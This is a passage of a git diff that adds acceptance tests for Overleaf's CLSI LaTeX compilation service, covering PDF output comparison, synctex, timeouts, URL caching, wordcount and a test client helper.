+/* eslint-disable + no-return-assign, + no-unused-vars, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. +/* + * decaffeinate suggestions: + * DS101: Remove unnecessary use of Array.from + * DS102: Remove unnecessary code created because of implicit returns + * DS103: Rewrite code to no longer use __guard__ + * DS207: Consider shorter variations of null checks + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +const Client = require('./helpers/Client') +const fetch = require('node-fetch') +const { pipeline } = require('node:stream') +const fs = require('node:fs') +const ChildProcess = require('node:child_process') +const ClsiApp = require('./helpers/ClsiApp') +const logger = require('@overleaf/logger') +const Path = require('node:path') +const fixturePath = path => { + if (path.slice(0, 3) === 'tmp') { + return '/tmp/clsi_acceptance_tests' + path.slice(3) + } + return Path.join(__dirname, '../fixtures/', path) +} +const process = require('node:process') +console.log( + process.pid, + process.ppid, + process.getuid(), + process.getgroups(), + 'PID' +) + +const MOCHA_LATEX_TIMEOUT = 60 * 1000 + +const convertToPng = function (pdfPath, pngPath, callback) { + if (callback == null) { + callback = function () {} + } + const command = `convert ${fixturePath(pdfPath)} ${fixturePath(pngPath)}` + console.log('COMMAND') + console.log(command) + const convert = ChildProcess.exec(command) + const stdout = '' + convert.stdout.on('data', chunk => console.log('STDOUT', chunk.toString())) + convert.stderr.on('data', chunk => console.log('STDERR', chunk.toString())) + return convert.on('exit', () => callback()) +} + +const compare = function (originalPath, generatedPath, callback) { + if (callback == null) { + callback = function () {} + } + const diffFile = `${fixturePath(generatedPath)}-diff.png` + const proc = ChildProcess.exec( + `compare -metric mae ${fixturePath(originalPath)} ${fixturePath( + generatedPath + )} ${diffFile}` + ) + let stderr = '' + proc.stderr.on('data', chunk => (stderr += chunk)) + return proc.on('exit', () => { + if (stderr.trim() === '0 (0)') { + // remove output diff if test matches expected image + fs.unlink(diffFile, err => { + if (err) { + throw err + } + }) + return callback(null, true) + } else { + console.log('compare result', stderr) + return callback(null, false) + } + }) +} + +const checkPdfInfo = function (pdfPath, callback) { + if (callback == null) { + callback = function () {} + } + const proc = ChildProcess.exec(`pdfinfo ${fixturePath(pdfPath)}`) + let stdout = '' + proc.stdout.on('data', chunk => (stdout += chunk)) + proc.stderr.on('data', chunk => console.log('STDERR', chunk.toString())) + return proc.on('exit', () => { + if (stdout.match(/Optimized:\s+yes/)) { + return callback(null, true) + } else { + return callback(null, false) + } + }) +} + +const compareMultiplePages = function (projectId, callback) { + if (callback == null) { + callback = function () {} + } + function compareNext(pageNo, callback) { + const path = `tmp/${projectId}-source-${pageNo}.png` + return fs.stat(fixturePath(path), (error, stat) => { + if (error != null) { + return callback() + } else { + return compare( + `tmp/${projectId}-source-${pageNo}.png`, + `tmp/${projectId}-generated-${pageNo}.png`, + (error, same) => { + if (error != null) { + throw error + } + same.should.equal(true) + return compareNext(pageNo + 1, callback) + } + ) + } + }) + } + return compareNext(0, callback) +} + +const comparePdf = function (projectId, exampleDir, callback) { + if (callback == null) { + callback = function () {} + } + console.log('CONVERT') + console.log(`tmp/${projectId}.pdf`, `tmp/${projectId}-generated.png`) + return convertToPng( + `tmp/${projectId}.pdf`, + `tmp/${projectId}-generated.png`, + error => { + if (error != null) { + throw error + } + return convertToPng( + `examples/${exampleDir}/output.pdf`, + `tmp/${projectId}-source.png`, + error => { + if (error != null) { + throw error + } + return fs.stat( + fixturePath(`tmp/${projectId}-source-0.png`), + (error, stat) => { + if (error != null) { + return compare( + `tmp/${projectId}-source.png`, + `tmp/${projectId}-generated.png`, + (error, same) => { + if (error != null) { + throw error + } + same.should.equal(true) + return callback() + } + ) + } else { + return compareMultiplePages(projectId, error => { + if (error != null) { + throw error + } + return callback() + }) + } + } + ) + } + ) + } + ) +} + +const downloadAndComparePdf = function (projectId, exampleDir, url, callback) { + fetch(url) + .then(res => { + if (!res.ok) { + return callback(new Error('non success response: ' + res.statusText)) + } + + const dest = fs.createWriteStream(fixturePath(`tmp/${projectId}.pdf`)) + pipeline(res.body, dest, err => { + if (err) return callback(err) + + checkPdfInfo(`tmp/${projectId}.pdf`, (err, optimised) => { + if (err) return callback(err) + + optimised.should.equal(true) + comparePdf(projectId, exampleDir, callback) + }) + }) + }) + .catch(callback) +} + +describe('Example Documents', function () { + Client.runFakeFilestoreService(fixturePath('examples')) + + before(function (done) { + ClsiApp.ensureRunning(done) + }) + before(function (done) { + fs.rm(fixturePath('tmp'), { force: true, recursive: true }, done) + }) + before(function (done) { + fs.mkdir(fixturePath('tmp'), done) + }) + after(function (done) { + fs.rm(fixturePath('tmp'), { force: true, recursive: true }, done) + }) + + return Array.from(fs.readdirSync(fixturePath('examples'))).map(exampleDir => + (exampleDir => + describe(exampleDir, function () { + before(function () { + return (this.project_id = Client.randomId() + '_' + exampleDir) + }) + + it('should generate the correct pdf', function (done) { + this.timeout(MOCHA_LATEX_TIMEOUT) + return Client.compileDirectory( + this.project_id, + fixturePath('examples'), + exampleDir, + (error, res, body) => { + if ( + error || + __guard__( + body != null ? body.compile : undefined, + x => x.status + ) === 'failure' + ) { + console.log('DEBUG: error', error, 'body', JSON.stringify(body)) + return done(new Error('Compile failed')) + } + const pdf = Client.getOutputFile(body, 'pdf') + return downloadAndComparePdf( + this.project_id, + exampleDir, + pdf.url, + done + ) + } + ) + }) + + return it('should generate the correct pdf on the second run as well', function (done) { + this.timeout(MOCHA_LATEX_TIMEOUT) + return Client.compileDirectory( + this.project_id, + fixturePath('examples'), + exampleDir, + (error, res, body) => { + if ( + error || + __guard__( + body != null ? body.compile : undefined, + x => x.status + ) === 'failure' + ) { + console.log('DEBUG: error', error, 'body', JSON.stringify(body)) + return done(new Error('Compile failed')) + } + const pdf = Client.getOutputFile(body, 'pdf') + return downloadAndComparePdf( + this.project_id, + exampleDir, + pdf.url, + done + ) + } + ) + }) + }))(exampleDir) + ) +}) + +function __guard__(value, transform) { + return typeof value !== 'undefined' && value !== null + ? transform(value) + : undefined +} diff --git a/services/clsi/test/acceptance/js/SimpleLatexFileTests.js b/services/clsi/test/acceptance/js/SimpleLatexFileTests.js new file mode 100644 index 0000000..e2256b2 --- /dev/null +++ b/services/clsi/test/acceptance/js/SimpleLatexFileTests.js @@ -0,0 +1,91 @@ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. +/* + * decaffeinate suggestions: + * DS102: Remove unnecessary code created because of implicit returns + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +const Client = require('./helpers/Client') +const request = require('request') +const ClsiApp = require('./helpers/ClsiApp') +const Settings = require('@overleaf/settings') + +describe('Simple LaTeX file', function () { + before(function (done) { + this.project_id = Client.randomId() + this.request = { + resources: [ + { + path: 'main.tex', + content: `\ +\\documentclass{article} +\\begin{document} +Hello world +\\end{document}\ +`, + }, + ], + options: { + metricsPath: 'clsi-perf', + metricsMethod: 'priority', + }, + } + return ClsiApp.ensureRunning(() => { + return Client.compile( + this.project_id, + this.request, + (error, res, body) => { + this.error = error + this.res = res + this.body = body + return done() + } + ) + }) + }) + + it('should return the PDF', function () { + const pdf = Client.getOutputFile(this.body, 'pdf') + return pdf.type.should.equal('pdf') + }) + + it('should return the log', function () { + const log = Client.getOutputFile(this.body, 'log') + return log.type.should.equal('log') + }) + + it('should provide the pdf for download', function (done) { + const pdf = Client.getOutputFile(this.body, 'pdf') + return request.get(pdf.url, (error, res, body) => { + if (error) return done(error) + res.statusCode.should.equal(200) + return done() + }) + }) + + it('should provide the log for download', function (done) { + const log = Client.getOutputFile(this.body, 'pdf') + return request.get(log.url, (error, res, body) => { + if (error) return done(error) + res.statusCode.should.equal(200) + return done() + }) + }) + + it('should gather personalized metrics', function (done) { + request.get(`${Settings.apis.clsi.url}/metrics`, (err, res, body) => { + if (err) return done(err) + body + .split('\n') + .some(line => { + return ( + line.startsWith('compile') && + line.includes('path="clsi-perf"') && + line.includes('method="priority"') + ) + }) + .should.equal(true) + done() + }) + }) +}) diff --git a/services/clsi/test/acceptance/js/Stats.js b/services/clsi/test/acceptance/js/Stats.js new file mode 100644 index 0000000..4f071ab --- /dev/null +++ b/services/clsi/test/acceptance/js/Stats.js @@ -0,0 +1,16 @@ +const request = require('request') +const Settings = require('@overleaf/settings') +after(function (done) { + request( + { + url: `${Settings.apis.clsi.url}/metrics`, + }, + (err, response, body) => { + if (err) return done(err) + console.error('-- metrics --') + console.error(body) + console.error('-- metrics --') + done() + } + ) +}) diff --git a/services/clsi/test/acceptance/js/SynctexTests.js b/services/clsi/test/acceptance/js/SynctexTests.js new file mode 100644 index 0000000..5ba5bb5 --- /dev/null +++ b/services/clsi/test/acceptance/js/SynctexTests.js @@ -0,0 +1,188 @@ +/* eslint-disable + no-unused-vars, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. +/* + * decaffeinate suggestions: + * DS102: Remove unnecessary code created because of implicit returns + * DS207: Consider shorter variations of null checks + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +const Client = require('./helpers/Client') +const request = require('request') +const { expect } = require('chai') +const ClsiApp = require('./helpers/ClsiApp') +const crypto = require('node:crypto') + +describe('Syncing', function () { + before(function (done) { + const content = `\ +\\documentclass{article} +\\begin{document} +Hello world +\\end{document}\ +` + this.request = { + resources: [ + { + path: 'main.tex', + content, + }, + ], + } + this.project_id = Client.randomId() + return ClsiApp.ensureRunning(() => { + return Client.compile( + this.project_id, + this.request, + (error, res, body) => { + this.error = error + this.res = res + this.body = body + return done() + } + ) + }) + }) + + describe('from code to pdf', function () { + return it('should return the correct location', function (done) { + return Client.syncFromCode( + this.project_id, + 'main.tex', + 3, + 5, + (error, pdfPositions) => { + if (error != null) { + throw error + } + expect(pdfPositions).to.deep.equal({ + pdf: [ + { + page: 1, + h: 133.768356, + v: 134.764618, + height: 6.918498, + width: 343.71106, + }, + ], + }) + return done() + } + ) + }) + }) + + describe('from pdf to code', function () { + return it('should return the correct location', function (done) { + return Client.syncFromPdf( + this.project_id, + 1, + 100, + 200, + (error, codePositions) => { + if (error != null) { + throw error + } + expect(codePositions).to.deep.equal({ + code: [{ file: 'main.tex', line: 3, column: -1 }], + }) + return done() + } + ) + }) + }) + + describe('when the project directory is not available', function () { + before(function () { + this.other_project_id = Client.randomId() + }) + describe('from code to pdf', function () { + it('should return a 404 response', function (done) { + return Client.syncFromCode( + this.other_project_id, + 'main.tex', + 3, + 5, + (error, body) => { + expect(String(error)).to.include('statusCode=404') + expect(body).to.equal('Not Found') + return done() + } + ) + }) + }) + describe('from pdf to code', function () { + it('should return a 404 response', function (done) { + return Client.syncFromPdf( + this.other_project_id, + 1, + 100, + 200, + (error, body) => { + expect(String(error)).to.include('statusCode=404') + expect(body).to.equal('Not Found') + return done() + } + ) + }) + }) + }) + + describe('when the synctex file is not available', function () { + before(function (done) { + this.broken_project_id = Client.randomId() + const content = 'this is not valid tex' // not a valid tex file + this.request = { + resources: [ + { + path: 'main.tex', + content, + }, + ], + } + Client.compile( + this.broken_project_id, + this.request, + (error, res, body) => { + this.error = error + this.res = res + this.body = body + return done() + } + ) + }) + + describe('from code to pdf', function () { + it('should return a 404 response', function (done) { + return Client.syncFromCode( + this.broken_project_id, + 'main.tex', + 3, + 5, + (error, body) => { + expect(String(error)).to.include('statusCode=404') + expect(body).to.equal('Not Found') + return done() + } + ) + }) + }) + describe('from pdf to code', function () { + it('should return a 404 response', function (done) { + return Client.syncFromPdf( + this.broken_project_id, + 1, + 100, + 200, + (error, body) => { + expect(String(error)).to.include('statusCode=404') + expect(body).to.equal('Not Found') + return done() + } + ) + }) + }) + }) +}) diff --git a/services/clsi/test/acceptance/js/TimeoutTests.js b/services/clsi/test/acceptance/js/TimeoutTests.js new file mode 100644 index 0000000..e9175d2 --- /dev/null +++ b/services/clsi/test/acceptance/js/TimeoutTests.js @@ -0,0 +1,66 @@ +/* eslint-disable + no-unused-vars, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. +/* + * decaffeinate suggestions: + * DS102: Remove unnecessary code created because of implicit returns + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +const Client = require('./helpers/Client') +const request = require('request') +const ClsiApp = require('./helpers/ClsiApp') +const { expect } = require('chai') + +describe('Timed out compile', function () { + before(function (done) { + this.request = { + options: { + timeout: 10, + }, // seconds + resources: [ + { + path: 'main.tex', + content: `\ +\\documentclass{article} +\\begin{document} +\\def\\x{Hello!\\par\\x} +\\x +\\end{document}\ +`, + }, + ], + } + this.project_id = Client.randomId() + return ClsiApp.ensureRunning(() => { + return Client.compile( + this.project_id, + this.request, + (error, res, body) => { + this.error = error + this.res = res + this.body = body + return done() + } + ) + }) + }) + + it('should return a timeout error', function () { + return this.body.compile.error.should.equal('container timed out') + }) + + it('should return a timedout status', function () { + return this.body.compile.status.should.equal('timedout') + }) + + it('should return isInitialCompile flag', function () { + expect(this.body.compile.stats.isInitialCompile).to.equal(1) + }) + + return it('should return the log output file name', function () { + const outputFilePaths = this.body.compile.outputFiles.map(x => x.path) + return outputFilePaths.should.include('output.log') + }) +}) diff --git a/services/clsi/test/acceptance/js/UrlCachingTests.js b/services/clsi/test/acceptance/js/UrlCachingTests.js new file mode 100644 index 0000000..9fc9608 --- /dev/null +++ b/services/clsi/test/acceptance/js/UrlCachingTests.js @@ -0,0 +1,617 @@ +/* eslint-disable + no-unused-vars, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. +/* + * decaffeinate suggestions: + * DS102: Remove unnecessary code created because of implicit returns + * DS207: Consider shorter variations of null checks + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +const express = require('express') +const Path = require('node:path') +const Client = require('./helpers/Client') +const sinon = require('sinon') +const ClsiApp = require('./helpers/ClsiApp') +const request = require('request') +const Settings = require('@overleaf/settings') + +const Server = { + run() { + const app = express() + + const staticServer = express.static(Path.join(__dirname, '../fixtures/')) + + const alreadyFailed = new Map() + app.get('/fail/:times/:id', (req, res) => { + this.getFile(req.url) + + const soFar = alreadyFailed.get(req.params.id) || 0 + const wanted = parseInt(req.params.times, 10) + if (soFar < wanted) { + alreadyFailed.set(req.params.id, soFar + 1) + res.status(503).end() + } else { + res.send('THE CONTENT') + } + }) + + app.get('/not-found', (req, res, next) => { + this.getFile(req.url) + res.status(404).end() + }) + + app.get('/project/:projectId/file/:fileId', (req, res, next) => { + this.getFile(req.url) + return res.send(`${req.params.projectId}:${req.params.fileId}`) + }) + + app.get('/bucket/:bucket/key/*', (req, res, next) => { + this.getFile(req.url) + return res.send(`${req.params.bucket}:${req.params[0]}`) + }) + + app.get('/:random_id/*', (req, res, next) => { + this.getFile(req.url) + req.url = `/${req.params[0]}` + return staticServer(req, res, next) + }) + + Client.startFakeFilestoreApp(app) + }, + + getFile() {}, + + randomId() { + return Math.random().toString(16).slice(2) + }, +} + +describe('Url Caching', function () { + Server.run() + + describe('Retries', function () { + before(function (done) { + this.project_id = Client.randomId() + this.happyFile = `${Server.randomId()}/lion.png` + this.retryFileOnce = `fail/1/${Server.randomId()}` + this.retryFileTwice = `fail/2/${Server.randomId()}` + this.fatalFile = `fail/42/${Server.randomId()}` + this.request = { + resources: [ + { + path: 'main.tex', + content: `\ +\\documentclass{article} +\\usepackage{graphicx} +\\begin{document} +\\includegraphics{lion.png} +\\end{document}\ +`, + }, + { + path: 'lion.png', + url: `http://filestore/${this.happyFile}`, + }, + { + path: 'foo.tex', + url: `http://filestore/${this.retryFileOnce}`, + }, + { + path: 'foo.tex', + url: `http://filestore/${this.retryFileTwice}`, + }, + { + path: 'foo.tex', + url: `http://filestore/${this.fatalFile}`, + }, + ], + } + + sinon.spy(Server, 'getFile') + ClsiApp.ensureRunning(() => { + Client.compile(this.project_id, this.request, (error, res, body) => { + this.error = error + this.res = res + this.body = body + done() + }) + }) + }) + + after(function () { + Server.getFile.restore() + }) + + function expectNFilestoreRequests(file, count) { + Server.getFile.args.filter(a => a[0] === file).should.have.length(count) + } + + it('should download the happy file once', function () { + expectNFilestoreRequests(`/${this.happyFile}`, 1) + }) + it('should retry the download of the unhappy files', function () { + expectNFilestoreRequests(`/${this.retryFileOnce}`, 2) + expectNFilestoreRequests(`/${this.retryFileTwice}`, 3) + expectNFilestoreRequests(`/${this.fatalFile}`, 3) + }) + }) + + describe('Downloading an image for the first time', function () { + before(function (done) { + this.project_id = Client.randomId() + this.file = `${Server.randomId()}/lion.png` + this.request = { + resources: [ + { + path: 'main.tex', + content: `\ +\\documentclass{article} +\\usepackage{graphicx} +\\begin{document} +\\includegraphics{lion.png} +\\end{document}\ +`, + }, + { + path: 'lion.png', + url: `http://filestore/${this.file}`, + }, + ], + } + + sinon.spy(Server, 'getFile') + return ClsiApp.ensureRunning(() => { + return Client.compile( + this.project_id, + this.request, + (error, res, body) => { + this.error = error + this.res = res + this.body = body + return done() + } + ) + }) + }) + + afterEach(function () { + return Server.getFile.restore() + }) + + return it('should download the image', function () { + return Server.getFile.calledWith(`/${this.file}`).should.equal(true) + }) + }) + + describe('When an image is in the cache and the last modified date is unchanged', function () { + before(function (done) { + this.project_id = Client.randomId() + this.file = `${Server.randomId()}/lion.png` + this.request = { + resources: [ + { + path: 'main.tex', + content: `\ +\\documentclass{article} +\\usepackage{graphicx} +\\begin{document} +\\includegraphics{lion.png} +\\end{document}\ +`, + }, + (this.image_resource = { + path: 'lion.png', + url: `http://filestore/${this.file}`, + modified: Date.now(), + }), + ], + } + + return Client.compile( + this.project_id, + this.request, + (error, res, body) => { + this.error = error + this.res = res + this.body = body + sinon.spy(Server, 'getFile') + return Client.compile( + this.project_id, + this.request, + (error1, res1, body1) => { + this.error = error1 + this.res = res1 + this.body = body1 + return done() + } + ) + } + ) + }) + + after(function () { + return Server.getFile.restore() + }) + + it('should not download the image again', function () { + return Server.getFile.called.should.equal(false) + }) + + it('should gather metrics', function (done) { + request.get(`${Settings.apis.clsi.url}/metrics`, (err, res, body) => { + if (err) return done(err) + body + .split('\n') + .some(line => { + return ( + line.startsWith('url_source') && line.includes('path="unknown"') + ) + }) + .should.equal(true) + done() + }) + }) + }) + + describe('When an image is in the cache and the last modified date is advanced', function () { + before(function (done) { + this.project_id = Client.randomId() + this.file = `${Server.randomId()}/lion.png` + this.request = { + resources: [ + { + path: 'main.tex', + content: `\ +\\documentclass{article} +\\usepackage{graphicx} +\\begin{document} +\\includegraphics{lion.png} +\\end{document}\ +`, + }, + (this.image_resource = { + path: 'lion.png', + url: `http://filestore/${this.file}`, + modified: (this.last_modified = Date.now()), + }), + ], + } + + return Client.compile( + this.project_id, + this.request, + (error, res, body) => { + this.error = error + this.res = res + this.body = body + sinon.spy(Server, 'getFile') + this.image_resource.modified = new Date(this.last_modified + 3000) + return Client.compile( + this.project_id, + this.request, + (error1, res1, body1) => { + this.error = error1 + this.res = res1 + this.body = body1 + return done() + } + ) + } + ) + }) + + afterEach(function () { + return Server.getFile.restore() + }) + + return it('should download the image again', function () { + return Server.getFile.called.should.equal(true) + }) + }) + + describe('When an image is in the cache and the last modified date is further in the past', function () { + before(function (done) { + this.project_id = Client.randomId() + this.file = `${Server.randomId()}/lion.png` + this.request = { + resources: [ + { + path: 'main.tex', + content: `\ +\\documentclass{article} +\\usepackage{graphicx} +\\begin{document} +\\includegraphics{lion.png} +\\end{document}\ +`, + }, + (this.image_resource = { + path: 'lion.png', + url: `http://filestore/${this.file}`, + modified: (this.last_modified = Date.now()), + }), + ], + } + + return Client.compile( + this.project_id, + this.request, + (error, res, body) => { + this.error = error + this.res = res + this.body = body + sinon.spy(Server, 'getFile') + this.image_resource.modified = new Date(this.last_modified - 3000) + return Client.compile( + this.project_id, + this.request, + (error1, res1, body1) => { + this.error = error1 + this.res = res1 + this.body = body1 + return done() + } + ) + } + ) + }) + + afterEach(function () { + return Server.getFile.restore() + }) + + return it('should download the other revision', function () { + return Server.getFile.called.should.equal(true) + }) + }) + + describe('When an image is in the cache and the last modified date is not specified', function () { + before(function (done) { + this.project_id = Client.randomId() + this.file = `${Server.randomId()}/lion.png` + this.request = { + resources: [ + { + path: 'main.tex', + content: `\ +\\documentclass{article} +\\usepackage{graphicx} +\\begin{document} +\\includegraphics{lion.png} +\\end{document}\ +`, + }, + (this.image_resource = { + path: 'lion.png', + url: `http://filestore/${this.file}`, + modified: (this.last_modified = Date.now()), + }), + ], + } + + return Client.compile( + this.project_id, + this.request, + (error, res, body) => { + this.error = error + this.res = res + this.body = body + sinon.spy(Server, 'getFile') + delete this.image_resource.modified + return Client.compile( + this.project_id, + this.request, + (error1, res1, body1) => { + this.error = error1 + this.res = res1 + this.body = body1 + return done() + } + ) + } + ) + }) + + afterEach(function () { + return Server.getFile.restore() + }) + + return it('should download the image again', function () { + return Server.getFile.called.should.equal(true) + }) + }) + + describe('After clearing the cache', function () { + before(function (done) { + this.project_id = Client.randomId() + this.file = `${Server.randomId()}/lion.png` + this.request = { + resources: [ + { + path: 'main.tex', + content: `\ +\\documentclass{article} +\\usepackage{graphicx} +\\begin{document} +\\includegraphics{lion.png} +\\end{document}\ +`, + }, + (this.image_resource = { + path: 'lion.png', + url: `http://filestore/${this.file}`, + modified: (this.last_modified = Date.now()), + }), + ], + } + + return Client.compile(this.project_id, this.request, error => { + if (error != null) { + throw error + } + return Client.clearCache(this.project_id, (error, res, body) => { + if (error != null) { + throw error + } + sinon.spy(Server, 'getFile') + return Client.compile( + this.project_id, + this.request, + (error1, res1, body1) => { + this.error = error1 + this.res = res1 + this.body = body1 + return done() + } + ) + }) + }) + }) + + afterEach(function () { + return Server.getFile.restore() + }) + + return it('should download the image again', function () { + return Server.getFile.called.should.equal(true) + }) + }) + + describe('fallbackURL', function () { + describe('when the primary resource is available', function () { + before(function (done) { + this.project_id = Client.randomId() + this.file = `/project/${Server.randomId()}/file/${Server.randomId()}` + this.fallback = `/bucket/project-blobs/key/ab/cd/${Server.randomId()}` + this.request = { + resources: [ + { + path: 'main.tex', + content: `\ +\\documentclass{article} +\\usepackage{graphicx} +\\begin{document} +\\includegraphics{lion.png} +\\end{document}\ +`, + }, + { + path: 'lion.png', + url: `http://filestore${this.file}`, + fallbackURL: `http://filestore${this.fallback}`, + }, + ], + } + + sinon.spy(Server, 'getFile') + return ClsiApp.ensureRunning(() => { + return Client.compile( + this.project_id, + this.request, + (error, res, body) => { + this.error = error + this.res = res + this.body = body + return done() + } + ) + }) + }) + + after(function () { + return Server.getFile.restore() + }) + + it('should download from the primary', function () { + Server.getFile.calledWith(this.file).should.equal(true) + }) + it('should not download from the fallback', function () { + Server.getFile.calledWith(this.fallback).should.equal(false) + }) + + it('should gather metrics', function (done) { + request.get(`${Settings.apis.clsi.url}/metrics`, (err, res, body) => { + if (err) return done(err) + body + .split('\n') + .some(line => { + return ( + line.startsWith('url_source') && + line.includes('path="user-files"') + ) + }) + .should.equal(true) + done() + }) + }) + }) + + describe('when the primary resource is not available', function () { + before(function (done) { + this.project_id = Client.randomId() + this.file = `/project/${Server.randomId()}/file/${Server.randomId()}` + this.fallback = `/bucket/project-blobs/key/ab/cd/${Server.randomId()}` + this.request = { + resources: [ + { + path: 'main.tex', + content: `\ +\\documentclass{article} +\\usepackage{graphicx} +\\begin{document} +\\includegraphics{lion.png} +\\end{document}\ +`, + }, + { + path: 'lion.png', + url: `http://filestore/not-found`, + fallbackURL: `http://filestore${this.fallback}`, + }, + ], + } + + sinon.spy(Server, 'getFile') + return ClsiApp.ensureRunning(() => { + return Client.compile( + this.project_id, + this.request, + (error, res, body) => { + this.error = error + this.res = res + this.body = body + return done() + } + ) + }) + }) + + after(function () { + return Server.getFile.restore() + }) + + it('should download from the fallback', function () { + Server.getFile.calledWith(`/not-found`).should.equal(true) + Server.getFile.calledWith(this.fallback).should.equal(true) + }) + + it('should gather metrics', function (done) { + request.get(`${Settings.apis.clsi.url}/metrics`, (err, res, body) => { + if (err) return done(err) + body + .split('\n') + .some(line => { + return ( + line.startsWith('url_source') && + line.includes('path="project-blobs"') + ) + }) + .should.equal(true) + done() + }) + }) + }) + }) +}) diff --git a/services/clsi/test/acceptance/js/WordcountTests.js b/services/clsi/test/acceptance/js/WordcountTests.js new file mode 100644 index 0000000..626b5d7 --- /dev/null +++ b/services/clsi/test/acceptance/js/WordcountTests.js @@ -0,0 +1,71 @@ +/* eslint-disable + no-unused-vars, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. +/* + * decaffeinate suggestions: + * DS102: Remove unnecessary code created because of implicit returns + * DS207: Consider shorter variations of null checks + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +const Client = require('./helpers/Client') +const request = require('request') +const { expect } = require('chai') +const path = require('node:path') +const fs = require('node:fs') +const ClsiApp = require('./helpers/ClsiApp') + +describe('Syncing', function () { + before(function (done) { + this.request = { + resources: [ + { + path: 'main.tex', + content: fs.readFileSync( + path.join(__dirname, '../fixtures/naugty_strings.txt'), + 'utf-8' + ), + }, + ], + } + this.project_id = Client.randomId() + return ClsiApp.ensureRunning(() => { + return Client.compile( + this.project_id, + this.request, + (error, res, body) => { + this.error = error + this.res = res + this.body = body + return done() + } + ) + }) + }) + + return describe('wordcount file', function () { + return it('should return wordcount info', function (done) { + return Client.wordcount(this.project_id, 'main.tex', (error, result) => { + if (error != null) { + throw error + } + expect(result).to.deep.equal({ + texcount: { + encode: 'utf8', + textWords: 2281, + headWords: 2, + outside: 0, + headers: 2, + elements: 0, + mathInline: 6, + mathDisplay: 0, + errors: 0, + messages: '', + }, + }) + return done() + }) + }) + }) +}) diff --git a/services/clsi/test/acceptance/js/helpers/Client.js b/services/clsi/test/acceptance/js/helpers/Client.js new file mode 100644 index 0000000..a0bdce7 --- /dev/null +++ b/services/clsi/test/acceptance/js/helpers/Client.js @@ -0,0 +1,248 @@ +/* eslint-disable + no-unused-vars, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. +/* + * decaffeinate suggestions: + * DS101: Remove unnecessary use of Array.from + * DS102: Remove unnecessary code created because of implicit returns + * DS207: Consider shorter variations of null checks + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +let Client +const express = require('express') +const request = require('request') +const fs = require('node:fs') +const Settings = require('@overleaf/settings') + +module.exports = Client = { + host: Settings.apis.clsi.url, + + randomId() { + return Math.random().toString(16).slice(2) + }, + + compile(projectId, data, callback) { + if (callback == null) { + callback = function () {} + } + if (data) { + // Enable pdf caching unless disabled explicitly. + data.options = Object.assign({}, { enablePdfCaching: true }, data.options) + } + return request.post( + { + url: `${this.host}/project/${projectId}/compile`, + json: { + compile: data, + }, + }, + callback + ) + }, + + clearCache(projectId, callback) { + if (callback == null) { + callback = function () {} + } + return request.del(`${this.host}/project/${projectId}`, callback) + }, + + getOutputFile(response, type) { + for (const file of Array.from(response.compile.outputFiles)) { + if (file.type === type && file.url.match(`output.${type}`)) { + return file + } + } + return null + }, + + runFakeFilestoreService(directory) { + const app = express() + app.use(express.static(directory)) + this.startFakeFilestoreApp(app) + }, + + startFakeFilestoreApp(app) { + let server + before(function (done) { + server = app.listen(error => { + if (error) { + done(new Error('error starting server: ' + error.message)) + } else { + const addr = server.address() + Settings.filestoreDomainOveride = `http://127.0.0.1:${addr.port}` + done() + } + }) + }) + after(function (done) { + server.close(done) + }) + }, + + syncFromCode(projectId, file, line, column, callback) { + Client.syncFromCodeWithImage(projectId, file, line, column, '', callback) + }, + + syncFromCodeWithImage(projectId, file, line, column, imageName, callback) { + if (callback == null) { + callback = function () {} + } + return request.get( + { + url: `${this.host}/project/${projectId}/sync/code`, + qs: { + imageName, + file, + line, + column, + }, + json: true, + }, + (error, response, body) => { + if (error != null) { + return callback(error) + } + if (response.statusCode !== 200) { + return callback(new Error(`statusCode=${response.statusCode}`), body) + } + return callback(null, body) + } + ) + }, + + syncFromPdf(projectId, page, h, v, callback) { + Client.syncFromPdfWithImage(projectId, page, h, v, '', callback) + }, + + syncFromPdfWithImage(projectId, page, h, v, imageName, callback) { + if (callback == null) { + callback = function () {} + } + return request.get( + { + url: `${this.host}/project/${projectId}/sync/pdf`, + qs: { + imageName, + page, + h, + v, + }, + json: true, + }, + (error, response, body) => { + if (error != null) { + return callback(error) + } + if (response.statusCode !== 200) { + return callback(new Error(`statusCode=${response.statusCode}`), body) + } + return callback(null, body) + } + ) + }, + + compileDirectory(projectId, baseDirectory, directory, callback) { + if (callback == null) { + callback = function () {} + } + const resources = [] + let entities = fs.readdirSync(`${baseDirectory}/${directory}`) + let rootResourcePath = 'main.tex' + while (entities.length > 0) { + const entity = entities.pop() + const stat = fs.statSync(`${baseDirectory}/${directory}/${entity}`) + if (stat.isDirectory()) { + entities = entities.concat( + fs + .readdirSync(`${baseDirectory}/${directory}/${entity}`) + .map(subEntity => { + if (subEntity === 'main.tex') { + rootResourcePath = `${entity}/${subEntity}` + } + return `${entity}/${subEntity}` + }) + ) + } else if (stat.isFile() && entity !== 'output.pdf') { + const extension = entity.split('.').pop() + if ( + [ + 'tex', + 'bib', + 'cls', + 'sty', + 'pdf_tex', + 'Rtex', + 'ist', + 'md', + 'Rmd', + 'Rnw', + ].indexOf(extension) > -1 + ) { + resources.push({ + path: entity, + content: fs + .readFileSync(`${baseDirectory}/${directory}/${entity}`) + .toString(), + }) + } else if ( + ['eps', 'ttf', 'png', 'jpg', 'pdf', 'jpeg'].indexOf(extension) > -1 + ) { + resources.push({ + path: entity, + url: `http://filestore/${directory}/${entity}`, + modified: stat.mtime, + }) + } + } + } + + return fs.readFile( + `${baseDirectory}/${directory}/options.json`, + (error, body) => { + const req = { + resources, + rootResourcePath, + } + + if (error == null) { + body = 